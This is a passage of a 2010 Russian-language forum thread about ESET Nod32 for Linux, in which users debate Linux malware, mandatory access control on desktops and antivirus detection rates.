Сообщение от PereresusNeVlezaetBuggyemail (ok), 16-Июн-10, 14:31 
>
>>Потому что я всегда сразу кладу скачиваемый файл в нужную мне папку.
>
>Эти директории всегда находятся в корне хомяка, и начинаются с точки?

А какая разница, где они находятся? Главное, что и я, и зловред, внедрившийся в исполняемый браузером код, туда можем записать что-то. Если браузер взломали, скажем, через ошибку в libjpeg, то следующая программа, которой я открою этот файл (или просто файловым менеджером в папку зайду со включённым показом превьюшек), скорее всего, схлопочет тот же stack code execution.

MAC в большинстве случаев не ставит стену против взломщика, а лишь сужает пролом. Если на сервере ещё как-то можно обычно поставить толковые ограничения, то на десктопе найти универсальные политики по определению нереально. Вон, в MS пробовали сделать роль Power Users — и что вышло? Вследствие ма-а-аленьких недоглядов паэурюзеры имели права почти неограниченные, хоть и не считаясь при этом формально администраторами. В итоге в Висте эту группу просто убрали, сдавшись. При большом желании можно выстроить политики для конкретного рабочего места, но не более. А сколько на это потребуется человеческих ресурсов? Например, я слабо представляю себе, как сделать MAC-политики для kdeinit, под которым выполняется куча сервисов, а-ля services.exe в винде.

А ещё домашние юзеры будут банально отключать MAC. Просто потому что при столь богато расписаных политиках система будет заметно тормозить. И с этим уже вряд ли что-то сделаешь, слишком много всего под капотом крутится в современных DE, что требует постоянных проверок на вшивость.

К слову, вы и сами сказали, что MAC не пользуетесь, и надеетесь, что не придётся. С чего бы, если по вашим словам, это панацея? ;)

Ответить | Правка | К родителю #137 | Наверх | Cообщить модератору

141. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  –1 +/
Сообщение от sHaggY_caT (ok), 16-Июн-10, 18:15 
>А какая разница, где они находятся? Главное, что и я, и зловред,
>внедрившийся в исполняемый браузером код, туда можем записать что-то. Если браузер
>взломали, скажем, через ошибку в libjpeg, то следующая программа, которой я
>открою этот файл (или просто файловым менеджером в папку зайду со
>включённым показом превьюшек), скорее всего, схлопочет тот же stack code execution.

совсем не факт :)

>MAC в большинстве случаев не ставит стену против взломщика, а лишь сужает
>пролом. Если на сервере ещё как-то можно обычно поставить толковые ограничения,
>то на десктопе найти универсальные политики по определению нереально.

В корпоративной среде вполне реально, а для дома сойдут и какие-то обще-типовые варианты + сgroups.
+, как я уже сказала, имхо, готовые правла для кучи приложений будут рулить.
Зачем вот, например, mc возможность соединяться с портом 25 на удаленных машинах?

Поэтому зачем нужно будет создателям ботнетов пытаться с этим справиться? Можно будет как и раньше мучать винду, на которую и патчи выходят после появления эсплойта в паблике, и куча людей метасплойтом умеет пользоваться (труд таких кодеров более дешев), и нет ничего подобного MAC: ломаем любой сервис под SYSTEM, и получаем SYSTEM привелегии :)

>MS пробовали сделать роль Power Users — и что вышло?

У MS проблема кучи legacy софта, написанного криво, и требующего, для работы, административных привелегий.

>При большом желании можно выстроить политики для конкретного рабочего
>места, но не более. А сколько на это потребуется человеческих ресурсов?

Мое предсказание, что совершенный минимум, и что настройка обоев и кнопочек под вкус пользователя будет занимать у HelpDesk службы как и сейчас гораздо больше времени.
После того, как всех немного поколбасит, будут и готовые сценарии для того же Puppet, и искоробочные решения вроде Sandbox (если что, я его еще не смотрела, но радует существование таких начинаний)

>Например, я слабо представляю себе, как сделать MAC-политики для kdeinit, под
>которым выполняется куча сервисов, а-ля services.exe в винде.

В KDE, с интеграцией WebKit/khtml наступают, увы, на грабли Microsoft.

>А ещё домашние юзеры будут банально отключать MAC.

Сперва, на первой волне, да. Но это не неповоротливый Microsoft, и не смотря на то, что Windows фанатики все еще будут вопить про вирусы в Linux, так вдруг окажется, что этим можно будет удобно пользоваться.

+ еще будут удобные технологии вроде повсеместного выполнения таких приложений, как браузеры в контейнерах.

>К слову, вы и сами сказали, что MAC не пользуетесь,

На десктопе не пользуюсь, так как сейчас нет смысла. Зачем обвешивать хижину на необитаемом острове амбарными замками, противопожарными системами безопасности, и пр?

>и надеетесь,
>что не придётся.

Не совсем так: не хочу, что бы кто-то пытался проломить MAC на тех наших серверах, где он используется, а вдруг у него получиться?
Но вот его наличие греет душу.

Ответить | Правка | К родителю #138 | Наверх | Cообщить модератору

142. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +/
Сообщение от PereresusNeVlezaetBuggyemail (ok), 17-Июн-10, 00:04 
>>А какая разница, где они находятся? Главное, что и я, и зловред,
>>внедрившийся в исполняемый браузером код, туда можем записать что-то. Если браузер
>>взломали, скажем, через ошибку в libjpeg, то следующая программа, которой я
>>открою этот файл (или просто файловым менеджером в папку зайду со
>>включённым показом превьюшек), скорее всего, схлопочет тот же stack code execution.
>
>совсем не факт :) 

$ sqlite3 /usr/local/share/sqlports "SELECT COUNT(*) FROM Ports WHERE LIB_DEPENDS GLOB '*jpeg*' OR WANTLIB GLOB '*jpeg*';"
320
$

И это лишь первый пришедший в голову пример. Уверен, что человек, съевший собаку на взломе чужих машин и задавшийся целью написать такой вот зловред, её достигнет. Возможно, у него на это уйдёт на это, скажем, в пять раз больше времени, чем в винде — пусть. Цели он своей достигнет, а дальше проблемы будут ваши.

>>MAC в большинстве случаев не ставит стену против взломщика, а лишь сужает
>>пролом. Если на сервере ещё как-то можно обычно поставить толковые ограничения,
>>то на десктопе найти универсальные политики по определению нереально.
>
>В корпоративной среде вполне реально,

При условии достаточной квалификации _постоянных_ админов, и наличии у них времени и желания этим заниматься.

> а для дома сойдут и какие-то обще-типовые варианты + сgroups.

Не сойдут. «Дома» все по жизни плюют на безопасность, взгляните в лицо реальности. Только гики, и то не все, знают и действительно себя берегут. Остальные — кто по незнанию, а кто и целенаправлено («мне бояться нечего, а вот игрушки не работают») отключают все защитные механизмы, как только они им начинают мешать. По опыту, те, кто всё же не отключает, компенсирует это сообразительностью вроде отсылки SMS на сайтах, обещающих тонны халявы.

>+, как я уже сказала, имхо, готовые правла для кучи приложений будут
>рулить.
>Зачем вот, например, mc возможность соединяться с портом 25 на удаленных машинах?

mc, может, и незачем. Но кто мешает запустить - абсолютно легально! - тот же dcop командой вроде той, что я приводил несколькими постами ранее? И посыпется спам с авторизованного ящика — прямо-таки счастье для спамера.

>Поэтому зачем нужно будет создателям ботнетов пытаться с этим справиться? Можно будет
>как и раньше мучать винду, на которую и патчи выходят после
>появления эсплойта в паблике, и куча людей метасплойтом умеет пользоваться (труд
>таких кодеров более дешев), и нет ничего подобного MAC: ломаем любой
>сервис под SYSTEM, и получаем SYSTEM привелегии :)

Ну, положим, если бы всё было так легко, вендекапец бы наступил давным-давно. :) А нужно, повторюсь, будет ломать то, что популярно. Это просто: ботнетам нужны компы, много компов. Вот и будут их собирать с самых распространённых платформ. Уж на что я люблю OpenBSD, но готов поспорить, что окажись он внезапно самой популярной ОСью на свете, и за его пользователей тоже примутся.

>>MS пробовали сделать роль Power Users — и что вышло?
>
>У MS проблема кучи legacy софта, написанного криво, и требующего, для работы,
>административных привелегий.

Эм, я вам про Фому, вы мне про Ерёму…

>[оверквотинг удален]
>вкус пользователя будет занимать у HelpDesk службы как и сейчас гораздо
>больше времени.
>После того, как всех немного поколбасит, будут и готовые сценарии для того
>же Puppet, и искоробочные решения вроде Sandbox (если что, я его
>еще не смотрела, но радует существование таких начинаний)
>
>>Например, я слабо представляю себе, как сделать MAC-политики для kdeinit, под
>>которым выполняется куча сервисов, а-ля services.exe в винде.
>
>В KDE, с интеграцией WebKit/khtml наступают, увы, на грабли Microsoft.

Наступают, не наступают, суть та же: MAC здесь бессилен.

>>А ещё домашние юзеры будут банально отключать MAC.
>
>Сперва, на первой волне, да. Но это не неповоротливый Microsoft, и не
>смотря на то, что Windows фанатики все еще будут вопить про
>вирусы в Linux, так вдруг окажется, что этим можно будет удобно
>пользоваться.

Ага. Если объяснить пользователям, как он работает. Только если сейчас с его настройкой зачастую не справляются специалисты, то что говорить про простых юзеров? Понимаете, что в итоге получится? Пару раз юзер тыркнется, обязательно напорется на собственный косяк, и тут добрая душа посоветует: «А отключи нафиг». Таким образом постоянно отключают фаерволы, антивирусы и прочее — всё, что мешает работать. Если же сделать такие средства защиты неотключаемыми, никто просто не будет пользоваться этой системой, а будет пользоваться другой, где они не включены и поэтому удобнее.

>+ еще будут удобные технологии вроде повсеместного выполнения таких приложений, как браузеры
>в контейнерах.

Угу, и дырки будут искать не только в браузерах, но ещё и в контейнерах.

>>К слову, вы и сами сказали, что MAC не пользуетесь,
>
>На десктопе не пользуюсь, так как сейчас нет смысла. Зачем обвешивать хижину
>на необитаемом острове амбарными замками, противопожарными системами безопасности, и пр?

Чтобы уметь ими пользоваться, когда понадобится, например. :)

>>и надеетесь,
>>что не придётся.
>
>Не совсем так: не хочу, что бы кто-то пытался проломить MAC на
>тех наших серверах, где он используется, а вдруг у него получиться?
>
>Но вот его наличие греет душу.

То есть вы говорите, что вам греет душу наличие механизма, на который не можете положиться?!

Ответить | Правка | К родителю #141 | Наверх | Cообщить модератору

143. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +/
Сообщение от sHaggY_caT (ok), 20-Июн-10, 12:28 

>>Но вот его наличие греет душу.
>
>То есть вы говорите, что вам греет душу наличие механизма, на который
>не можете положиться?!

Зачем Вы передергиваете? Греет душу наличие механизма, на который с _высокой_(но не запредельной) вероятностью можно положиться.

Что касается Ваших примеров, вот не занималась я огранизацией защиты своей станции, но уверена, что для современного d-bus вполне есть (или можно придумать) решения на MAC.
Разбираться в них сейчас нет времени. Думаю, нас рассудит(сорри за тавтологию) время.

А что касается юзеров, они часто просто не умеют отключать дефольты, особенно блондинки, пользующиеся нетбуками.

dcop же уже давно мертв, и примеры из него уже давно не актуальны. Извините, разбираться  с ним (что бы поспорить с Вами на одном уровне) не хочется (пустая трата времени на изучение мертвой технологии)

Ответить | Правка | К родителю #142 | Наверх | Cообщить модератору

144. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +/
Сообщение от PereresusNeVlezaetBuggyemail (ok), 20-Июн-10, 15:56 
>
>>>Но вот его наличие греет душу.
>>
>>То есть вы говорите, что вам греет душу наличие механизма, на который
>>не можете положиться?!
>
>Зачем Вы передергиваете? Греет душу наличие механизма, на который с _высокой_(но не
>запредельной) вероятностью можно положиться.

Бр-р-р. Может, я дурак, но не понимаю, как можно на что-то положиться с вероятностью. Либо доверие есть, либо нет. Доверие на 99% — это не доверие. Неважно, сколько брешей закрывает ваша защита — важно, сколько их остаётся. А уж когда найдут оставшиеся и ими воспользуются — завтра или послезавтра — уже не столь принципиально. Если, конечно, не работать по принципу «заказчик принял, и ладно».

>Что касается Ваших примеров, вот не занималась я огранизацией защиты своей станции,
>но уверена, что для современного d-bus вполне есть (или можно придумать)
>решения на MAC.
>Разбираться в них сейчас нет времени. Думаю, нас рассудит(сорри за тавтологию) время.

Согласен, будущее покажет.

>А что касается юзеров, они часто просто не умеют отключать дефольты, особенно
>блондинки, пользующиеся нетбуками.

Ага, до тех пор, пока они им не начинают мешать раскладывать вон-тот-виденный-у-Алексеевны-пасьянс. Тут у них и сообразительность включается (как минимум найти знакомого «спеца», который сделает им приятно); правда, хватает этой сообразительности ровно на то, чтобы добиться желаемого.

>dcop же уже давно мертв, и примеры из него уже давно не
>актуальны. Извините, разбираться  с ним (что бы поспорить с Вами
>на одном уровне) не хочется (пустая трата времени на изучение мертвой
>технологии)

DCOP мёртв как протокол. Утилита dcop по-прежнему в строю и никуда не девается, просто работает теперь через D-Bus.

Да и пример это был лишь первый пришедший в голову. Уверен, что люди, хорошо знающие нутро X.org и современных DE найдут ещё тысячу и один способ. Особенно если у них будет стимул посильнее болтовни на форуме. :)

Ответить | Правка | К родителю #143 | Наверх | Cообщить модератору

145. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +/
Сообщение от JL2001 (ok), 04-Июл-10, 16:36 
>
>>И постоянно опаздывать, ошибаться и не справляться. Как вы, например, средствами MAC
>>запретите браузеру перезаписывать файлы, подконтрольные юзеру, без ущерба для его, пользователя,
>>работы?
>
>Браузер может сохранять картинки и заказчки только в одну директорию. Эта директория(ее
>поддиректории) могут быть для пользователя перемонтированы mount --bind на поддиректории картинок,
>документов, и т д.
>
>Пользователи привыкнут :)

GoboLinux ? чтож его так мало ? пока за задницу злобный троян не укусил и не вспоминают

Ответить | Правка | К родителю #118 | Наверх | Cообщить модератору

146. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +/
Сообщение от sHaggY_caT (ok), 04-Июл-10, 17:11 

>GoboLinux ? чтож его так мало ? пока за задницу злобный троян
>не укусил и не вспоминают

Имхо, Глупости. Виндовая организация директорий никак не коррелирует с безопасностью: у запущенной не под root, а под пользователем программой нет никаких прав на запись в /lib, /etc, и т д, только в хомяк.
В Windows же мы часто не только наблюдаем library hell, который сам по себе вызван этой структурой организации директорий (сюда же кучу минусов про приучение пользователей к срачу в файловой структуре, или отсуствии в Windows аналогов пакетных менеджеров: WSUS/msi имеют очень ограниченную применимость именно из-за файловой структуры), но и инфицирование различного ПО, и именно из-за того, что ПО располагается не там, где с точки зрения безопасности было продумано создателями дистрибутива, а там, где удобнее (быдло)кодеру

Вот именно с возможностью гадить в хомяк и нужно бороться, возможно, изменением структуры хомяка.

Что касается более-менее строгой организации директорий GoboLinux, и "рецептов", аналогов портов, я не понимаю только одного: _зачем_ это нужно(с точки зрения безопасности, да и вообще смысла), если с безопасностью root-аккаунта в любом *nix и так все хорошо, а *nix с MAC или контейнерами еще лучше?

Ответить | Правка | К родителю #145 | Наверх | Cообщить модератору

139. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +/
Сообщение от Frankemail (??), 16-Июн-10, 16:40 
Прикольно конечно читать базу документированных вендоров вирусов :))
НО... что-то там не видно (на дрвебовском-то сервисе!) ни одного вируса с "поставщиком" (вендором) - дрвеб, и нет ни у одного кагбэ вируса описания (у всех "Описание находится в разработке"). Наверное потому, что в природе не встречаются? Вы например можете поведать, что это за вирус такой - Exploit.Linux.DCom.b например? :) Или Linux/Exploit-Mmap - вобще феерически.
Nod32 и под виндой-то ловит вирусы через одного... а уж байки про линуксовые вирусы мы не первый год слышим, но так и не видим.
Ответить | Правка | К родителю #40 | Наверх | Cообщить модератору

140. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +1 +/
Сообщение от PereresusNeVlezaetBuggyemail (ok), 16-Июн-10, 17:21 
>Прикольно конечно читать базу документированных вендоров вирусов :))
>НО... что-то там не видно (на дрвебовском-то сервисе!) ни одного вируса с
>"поставщиком" (вендором) - дрвеб,

Вы не разобрались в таблице, видимо. В ней указаны названия вирусов, которые знает Dr.Web, у других антивирусных вендоров. Это не значит, что все данные вирусы были обнаружены этими вендорами, таковая информация в данном списке отсутствует.

> и нет ни у одного кагбэ вируса
>описания (у всех "Описание находится в разработке").

Если хотите, начните их писать. Для вирусов под другие платформы описание тоже далеко не всегда указывается.

> Наверное потому, что в
>природе не встречаются? Вы например можете поведать, что это за вирус
>такой - Exploit.Linux.DCom.b например? :) Или Linux/Exploit-Mmap - вобще феерически.

А что, вы все вирусы под винду можно поимённо назвать?

>Nod32 и под виндой-то ловит вирусы через одного... а уж байки про
>линуксовые вирусы мы не первый год слышим, но так и не
>видим.

Гугль вам в помощь.

Ответить | Правка | Наверх | Cообщить модератору

23. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +2 +/
Сообщение от birdie (?), 13-Июн-10, 20:40 
Вы слишком много подразумеваете. :)

*Все* AV для Линукс сделаны с единственной целью и ловят только Windows вирусы (не считая 0.1% дряни - Java (mobile phones)/JPG (invalid -> buffer overflow)/BMP (invalid -> buffer overflow)/PDF(Adobe Reader vulnerabilities)).

Ответить | Правка | К родителю #15 | Наверх | Cообщить модератору

25. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  –2 +/
Сообщение от kas5temail (ok), 13-Июн-10, 20:47 
Текст новости:

>Компания Eset выпустила  вторую бета версию антивируса Nod32 для Linux

Ответить | Правка | Наверх | Cообщить модератору

26. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +2 +/
Сообщение от birdie (?), 13-Июн-10, 20:56 
Как бы вы написали тогда?

"Компания Eset выпустила  вторую бета версию антивируса Nod32, работающего на Linux?" Тоже можно подумать, что он лечит Linux вирусы :)

Функция редактирования новости доступна для всех - правьте!

Ответить | Правка | Наверх | Cообщить модератору

32. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +1 +/
Сообщение от kas5temail (ok), 13-Июн-10, 21:07 
Компания Eset выпустила вторую бета версию антивируса Nod32 для Linux, предназначенного для поиска вирусов, которые могут работать только на Windows-машинах.
Ответить | Правка | Наверх | Cообщить модератору

60. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +/
Сообщение от yet another anonim (?), 14-Июн-10, 01:32 
>Компания Eset выпустила вторую бета версию антивируса Nod32 для Linux, предназначенного для
>поиска вирусов, которые могут работать только на Windows-машинах.

Вы, конечно, по большому счёту правы, но почему вы так уверены, что нативно Линуксовых вирусов нет и быть не может? Это как бы расходится с логикой.. да и вообще как раз теперь, с распространением Линукса (в т.ч. в гос. органах стран и на самом трендовом - разного рода мобилках) назревают благотворные для линуксового вирусописания времена, не считаете?

Ответить | Правка | Наверх | Cообщить модератору

63. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  –1 +/
Сообщение от PereresusNeVlezaetBuggyemail (ok), 14-Июн-10, 01:42 
>>Компания Eset выпустила вторую бета версию антивируса Nod32 для Linux, предназначенного для
>>поиска вирусов, которые могут работать только на Windows-машинах.
>
>Вы, конечно, по большому счёту правы, но почему вы так уверены, что
>нативно Линуксовых вирусов нет и быть не может? Это как бы
>расходится с логикой..

Это прежде всего расходится с фактами.

Ответить | Правка | Наверх | Cообщить модератору

71. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +1 +/
Сообщение от Below (ok), 14-Июн-10, 03:46 
Да причем здесь факты, просто любой юниксоид скажет, что нельзя сидеть под рутом, в винде же каждый второй - администратор с правами, конечно ограничеными, но достаточными, чтобы повредить систему
Ответить | Правка | Наверх | Cообщить модератору

80. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  –1 +/
Сообщение от pavlinux (ok), 14-Июн-10, 04:44 
А убунту грохнуть как два байта об асфальт. sudo открыто

Ответить | Правка | Наверх | Cообщить модератору

83. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +/
Сообщение от Anonymouse (?), 14-Июн-10, 08:47 
>А убунту грохнуть как два байта об асфальт. sudo открыто

Дружище, сдается мне - она у тебя сама рухнет.

Ответить | Правка | Наверх | Cообщить модератору

41. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  –8 +/
Сообщение от PereresusNeVlezaetBuggyemail (ok), 13-Июн-10, 22:04 
>Вы слишком много подразумеваете. :)
>
>*Все* AV для Линукс сделаны с единственной целью и ловят только Windows вирусы (не считая 0.1% дряни - Java (mobile phones)/JPG (invalid -> buffer overflow)/BMP (invalid -> buffer overflow)/PDF(Adobe Reader vulnerabilities)).

Ложь.

Ответить | Правка | К родителю #23 | Наверх | Cообщить модератору

89. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +/
Сообщение от Карбофос (ok), 14-Июн-10, 12:13 
я разбирал на составляющие этот пакет, там база и для виндовой вирусни.
Ответить | Правка | К родителю #15 | Наверх | Cообщить модератору

29. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +9 +/
Сообщение от аноним (?), 13-Июн-10, 21:05 
а почему 35?
не 40 и не 30, а 35?

зы:
кажется я понимаю почему вся страна в ж... еще не начальник, а уже увольнять. ни разу не встречал ситуацию, когда только клам и ловит, но цифру знает точно.
у меня было несколько раз, когда на файловый сервер с клиентов с дриуб, кав, нав прилетали файлы с вирусами, которые ловил только клам.
и защита должна быть и на сервере, и на клиенте. и желательно разные. поэтому на сервере клама более чем достаточно. на клиенте - по выбору.

Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору

96. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +/
Сообщение от sHaggY_caT (ok), 14-Июн-10, 23:09 
>clamav ловит < 35% in the wild вирусов, если вы админ, я бы вас уже уволил.

Про 35% Вы загнули (или пруфлинк исследования, гарантированно не проплаченный антивирусной конторой, пожалуйста, в студию, или уволить нужно Вас!),

Дело в том, что и коммерческие не ловят 100% :)
Имхо, два разных антивируса позволят выловить больше, чем один.

Мы вот используем, для не очень богатых клиентов, связку clamav + антивирус от Microsoft, в логах havp отнюдь не совсем чисто, и, в общем-то, случаи заражения достаточно редки, хотя и бывают (в основном, с флэшек или еще какими-нибудь дурацкими способами)

Хотя, конечно, используем HAVP в стандартном прокси как раз для того, что бы некоторым предложить купить к нему DrWeb.

Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей 		Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру